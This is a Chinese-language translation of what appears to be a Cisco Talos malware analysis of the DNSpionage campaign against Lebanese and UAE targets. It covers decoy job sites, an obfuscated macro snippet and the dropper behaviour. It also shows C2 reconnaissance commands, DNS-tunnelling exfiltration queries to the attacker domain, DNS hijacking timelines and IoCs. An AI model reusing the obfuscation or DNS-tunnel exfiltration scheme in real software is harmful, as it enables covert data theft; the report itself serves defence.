DNSpionage惡意活動將目標瞄準中東地區

摘要： 一、摘要 Cisco Talos團隊最近發現了一個針對黎巴嫩和阿聯酋的新型惡意活動，主要針對.gov域名以及一傢俬營黎巴嫩航空公司。根據我們的研究，該惡意活動幕後的組織花費了很長時間來掌握受害者的網路基礎設施結構，從而保證他們的攻擊過程不會引起注意。 基於該惡意活動使用的基礎設施和TT...

一、摘要

Cisco Talos團隊最近發現了一個針對黎巴嫩和阿聯酋的新型惡意活動，主要針對.gov域名以及一傢俬營黎巴嫩航空公司。根據我們的研究，該惡意活動幕後的組織花費了很長時間來掌握受害者的網路基礎設施結構，從而保證他們的攻擊過程不會引起注意。

基於該惡意活動使用的基礎設施和TTP，我們無法將其與最近觀察到的任何其他組織或惡意活動相關聯。這一惡意活動使用了兩個虛假的惡意網站，網站中包含帶有嵌入式巨集的惡意Microsoft Office文件，利用惡意文件來對目標造成破壞。該惡意活動中使用的惡意軟體，我們將其稱為“DNSpionage”，該惡意軟體支援通過HTTP和DNS方式與攻擊者進行通訊。

在每次惡意活動中，攻擊者都使用相同的IP地址來對合法.gov網站和私有公司域名的DNS進行重定向。在每次DNS攻擊中，攻擊者都為重定向的域名生成了Let的加密證書，這些證書為使用者免費提供X.509 TLS認證。目前，我們還不知道DNS重定向是否成功。

在本文，我們將剖析攻擊者採用的方法，並展示他們是如何使用惡意文件試圖誘騙使用者開啟惡意網站的，這些惡意網站主要針對想要求職的使用者。此外，我們還將對惡意DNS重定向事件的時間軸進行描述。

二、感染媒介

2.1 虛假求職網站

首先，攻擊者嘗試誘導使用者訪問兩個惡意網站，這兩個網站均模仿了合法網站：

·hr-wipro[.]com（重定向到wipro.com）

·hr-suncor[.]com（重定向到suncor.com）

在這些站點中，託管了惡意的Microsoft Offcie文件，其URL如下：

·hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc

該檔案是加拿大可持續能源公司Suncor Energy網站上提供的合法檔案的副本，其中包含惡意巨集。

目前，我們還不清楚目標使用者是如何收到這些連結的。攻擊者很可能通過電子郵件方式傳送惡意文件，並將其作為魚叉式網路釣魚的一部分。但實際上，該連結也可以通過社交平臺（例如LinkedIn）傳播，從而使“新工作機會”這一誘導內容顯得更加合理。

2.2 惡意Office文件

在開啟第一個Office文件後，使用者會看到一條提示“內容模式可用”（Content Mode Available）：

2.3 惡意巨集分析

我們對樣本中使用的巨集進行了分析，發現巨集主要進行兩步操作：

1、開啟文件時，巨集將解碼使用Base 64編碼的PE檔案，並將其投放到%UserProfile%\.oracleServices\svshost_serv.doc位置。

2、當文件關閉時，巨集將檔案svshost_serv.doc重新命名為svshost_serv.exe。然後，巨集將建立一個名為chromium updater v 37.5.0的計劃任務，以便執行二進位制檔案。計劃任務會在每分鐘執行一次。

這兩個步驟的主要目的，是防止沙盒檢測。

Payload將在Microsoft Office關閉時執行，這意味著需要通過人工互動才能使其執行。儘管我們可以通過分析獲知這些巨集的具體功能，但它在Microsoft Word中受到密碼保護，受害者將無法通過Microsoft Office檢視到巨集程式碼。

此外，巨集採用了經典的字串混淆，以避免字串檢測：

Const e0 = "sc"
Const e1 = "he"
Const e2 = "ule.ser"
'Create the TaskService object.
Set service = CreateObject(e0 & e1 & "d" & e2 & "vice")
Call service.Connect

“schedule.service”字串通過組合而成。最終的Payload是一個名為“DNSpionage”的遠端管理工具。

三、DNSpionage惡意軟體分析

3.1 惡意軟體分析

惡意文件投放的惡意軟體，是一個此前未發現過的遠端管理工具，我們將其命名為DNSpionage，因為它支援將DNS隧道作為與攻擊者基礎設施進行通訊的隱蔽通道。

DNSpionage在執行目錄中，建立如下檔案和資料夾：

%UserProfile%\.oracleServices/
%UserProfile%\.oracleServices/Apps/
%UserProfile%\.oracleServices/Configure.txt
%UserProfile%\.oracleServices/Downloads/
%UserProfile%\.oracleServices/log.txt
%UserProfile%\.oracleServices/svshost_serv.exe
%UserProfile%\.oracleServices/Uploads/

攻擊者使用Downloads目錄，儲存從C&C伺服器下載的其他指令碼和工具。

在將檔案轉發到C&C伺服器之前，攻擊者使用Uploads目錄臨時儲存檔案。

Log.txt檔案是一個純文字形式的日誌，所有執行的命令都將記錄在該檔案中，包含命令的執行結果。

Configure.txt檔案中包含惡意軟體的配置，攻擊者可以指定自定義命令和控制（C&C）URL、URI和作為DNS隱蔽通道的域名。此外，攻擊者可以指定自定義Base64字母表實現混淆。我們發現攻擊者針對每個目標都使用了自定義的字母。

所有資料都以JSON格式傳輸，這也就是為什麼惡意軟體的大部分程式碼都是JSON庫的原因。

3.2 通訊方式

惡意軟體使用HTTP和DNS的方式，與C&C伺服器進行通訊。

3.2.1 HTTP模式

使用Base 64編碼後的隨機資料，執行DNS請求（傳送至0ffice36o[.]com）。該請求負責註冊被感染的系統，並接收HTTP伺服器的IP（分析期間接收到的IP是185.20.184[.]138）。DNS的請求示例如下：

oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com

在其上下文中，前四個字元由惡意軟體使用rand()函式隨機生成。然後，域名的其他部分使用Base32進行編碼，其解碼後的值為1Fy2048。其中，“Fy”是目標ID，“2048”（0x800）表示“未找到配置檔案”。如果沒有在受感染的計算機上檢索到配置檔案，則會發出該請求。這一請求是用於通知攻擊者的。

惡意軟體向hxxp://IP/Client/Login?id=Fy傳送初始HTTP請求，以檢索其配置。該請求將用於建立配置檔案，特別是設定自定義的Base64字典。

第二個HTTP請求是hxxp://IP/index.html?id=XX，其中“XX”是被感染主機的ID。該請求將用於檢索訂單，網站是一個虛假的維基百科頁面：

這些命令包含在頁面的原始碼中：

在這一示例中，命令使用標準的Base64演算法進行編碼，因為目前還沒有收到自定義的字母表。下面是使用了自定義字母表的另一個配置檔案示例：

C&C伺服器會將下面三個命令，自動傳送到受感染的系統：

{"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
{"c": "hostname", "i": "-5000", "t": -1, "k": 0}
{"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

惡意軟體在執行這些命令後，生成以下程式碼：

攻擊者要求使用使用者名稱和主機名，來檢索受感染使用者的域名。第一步顯然是偵查階段。資料最終會發送到hxxp://IP/Client/Upload。

最後，CreateProcess()執行命令，並將輸出結果重定向到使用CreatePipe()建立的惡意軟體通道。

3.2.2 DNS模式

該惡意軟體還支援僅DNS模式。在這一模式下，請求和響應將通過DNS實現。這一選項是在受感染計算機上的configure.txt檔案中指定。通過利用DNS，有時可以更容易的將資訊發回給攻擊者，因為它通常會利用DNS協議來逃避代理或Web過濾。

首先，惡意軟體進行DNS查詢，以請求是否存在訂單，例如：

RoyNGBDVIAA0[.]0ffice36o[.]com

首先，需要忽略前四個字元，因為這是隨機生成的字元，相關的資料是GBDVIAA0。對Base32進行解碼後，其值是“0GT\x00”。GT是目標ID，\x00是請求編號。C&C伺服器將回復DNS請求，其回覆內容是一個IP地址，儘管不一定是有效的IP，但實際上DNS協議可以接受這個值，例如0.1.0.3。我們認為，第一個值（0x0001）是下一個DNS請求的命令ID，0x0003是命令的大小。

隨後，惡意軟體使用命令ID執行DNS查詢：

t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")

C&C伺服器將返回一個新的IP：100.105.114.0。如果我們將這個IP地址進行ASCII值轉換，將會得到“dir\x00”，也就是要執行的命令。

最後，執行命令的結果將由多個DNS請求傳送：

gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
[...]

四、被感染使用者

由於惡意活動使用了DNS方式，再加上使用了Cisco Umbrella，我們可以確定10月至11月期間的一些受害者的位置。下圖為0ffice36o[.]com的分析圖表：

查詢過程是在黎巴嫩和阿聯酋進行的。在下一節中，我們對DNS重定向進行分析，也確認了這一資訊。

五、DNS重定向

5.1 簡介

Talos發現了三個與DNSpionage域名相關聯的IP地址：

·185.20.184.138

·185.161.211.72

·185.20.187.8

這三個IP地址，均由DeltaHost託管。

最後一個IP地址，用於在9月至11月期間進行的DNS重定向攻擊。黎巴嫩和阿聯酋公共部門的多個域名伺服器，以及黎巴嫩的一些公司受到了攻擊，他們所擁有的一些主機名被重定向到攻擊者控制的IP地址。攻擊者在一小段時間內，將主機名重定向到185.20.187.8這個IP地址。在重定向IP之前，攻擊者使用Let的加密服務，建立了與域名匹配的證書。

在本節中，我們將介紹監測到的所有DNS重定向例項，以及每個與例項相關聯的攻擊者生成的證書。我們不知道重定向攻擊最終是否成功，也不清楚DNS重定向服務的確切目的。但是，其影響非常大，因為攻擊者能夠攔截在此期間發往這些主機名的所有流量。由於攻擊者專門針對電子郵件和VPN流量，因此可能用於收集其他資訊，例如電子郵件和VPN憑據。

由於其收到的電子郵件也會到達攻擊者的IP地址，如果存在多因素身份驗證，那麼將允許攻擊者獲得濫用的MFA程式碼。由於攻擊者能夠訪問電子郵件，所以他們也就可以進行額外的攻擊，甚至對目標發起勒索。

我們監測到的DNS重定向發生在多個位置，這些被攻陷的資產，沒有發現存在基礎架構、員工或工作流程上的問題。因此，我們認為這些資產的攻陷，不是由於人為錯誤，也不是這些組織中管理員的失誤，這是攻擊者進行的惡意行為。

5.2 針對黎巴嫩政府的重定向攻擊

Talos發現黎巴嫩財政部的電子郵件域名，是惡意DNS重定向的目標之一。

webmail.finance.gov.lb在11月6日06:19:13（GMT）被重定向到185.20.187.8。在同一天的05:07:25，建立了Let’s Encrypt證書。

5.3 針對阿聯酋政府的重定向攻擊

阿聯酋的公共設施也是目標之一，我們通過當地警方和電信監管局確定了一個域名。

adpvpn.adpolice.gov.ae在9月13日06:39:39（GMT）被重定向到185.20.187.8。在同一天的05:37:54，建立了Let’s Encrypt證書。

mail.mgov.ae在9月15日07:17:51（GMT）被重定向到185.20.187.8。在同一天的06:15:51，建立了Let’s Encrypt證書。

mail.apc.gov.ae在9月24日被重定向到185.20.187.8。在同一天的05:41:49，建立了Let’s Encrypt證書。

5.4 針對中東航空公司的重定向攻擊

Talos發現，黎巴嫩的一家航空公司，中東航空公司（MEA）也是DNS重定向的目標之一。

memail.mea.com.lb在11月14日11:58:36（GMT）被重定向到185.20.187.8。在11月6日10:35:10（GMT），建立了Let’s Encrypt證書。

該證書包含主題行中的備用名稱，這是DNS的一項功能，允許將多個域名新增到SSL活動的證書中：

·memail.mea.com.lb

· autodiscover.mea.com.lb

· owa.mea.com.lb

· www.mea.com.lb

· autodiscover.mea.aero

· autodiscover.meacorp.com.lb

· mea.aero

· meacorp.com.lb

· memailfr.meacorp.com.lb

· meoutlook.meacorp.com.lb

· tmec.mea.com.lb

這些域名，是在清晰準確理解受害者域名後建立的，我們相信，攻擊者在這些環境中非常活躍，從而瞭解他們需要生成的特定域名和證書。

六、總結

通過我們的調查，發現了兩個事件：DNSpionage惡意軟體和DNS重定向惡意活動。針對惡意軟體活動，儘管我們不知道確切的目標，但已經將攻擊者的目標鎖定在了黎巴嫩和阿聯酋這兩個國家。但是，如上文所述，我們還是希望能夠分析出定向惡意活動所針對的目標。

目前，我們有信心確定這兩個惡意活動都來自同一個惡意組織。但是，我們對該組織的位置和確切動機知之甚少。很明顯，這個惡意組織能在兩個月內從兩個不同國家的政府域名以及一家黎巴嫩國家航空公司實現DNS重定向。通過利用DNS洩露和重定向，攻擊者就可以從系統的角度使用Windows惡意軟體。目前還不清楚這些DNS重定向攻擊是否成功，但攻擊者是在不斷嘗試，該嘗試在今年發生了5次，其中包含過去兩週內發生的攻擊。

使用者在得知這一惡意活動後，應該考慮啟用終端保護措施和網路保護措施。這是一個先進的攻擊方式，並且將目標放在了一些重要的組織機構上，攻擊者應該不會輕易放棄。

七、IoC

在分析相關惡意活動期間，我們發現以下IoC與各類惡意軟體分發活動相關聯。

假的求職網站：

· hr-wipro[.]com

· hr-suncor[.]com

惡意文件：

· 9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 （LB submit）

· 15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa （LB submit）

DNSpionage樣本：

· 2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec 82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969

· 45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff

C&C伺服器IP：

· 185.20.184.138

· 185.20.187.8

· 185.161.211.72

C&C伺服器域名：

· 0ffice36o[.]com

DNS劫持域名（轉向185.20.187.8）：

· 2018-11-14 : memail.mea.com.lb

· 2018-11-06 : webmail.finance.gov.lb

· 2018-09-24 : mail.apc.gov.ae

· 2018-09-15 : mail.mgov.ae

· 2018-09-13 : adpvpn.adpolice.gov.ae

MEA證書中的域名：

· memail.mea.com.lb

· autodiscover.mea.com.lb

· owa.mea.com.lb

· www.mea.com.lb

· autodiscover.mea.aero

· autodiscover.meacorp.com.lb

· mea.aero

· meacorp.com.lb

· memailr.meacorp.com.lb

· meoutlook.meacorp.com.lb

· tmec.mea.com.lb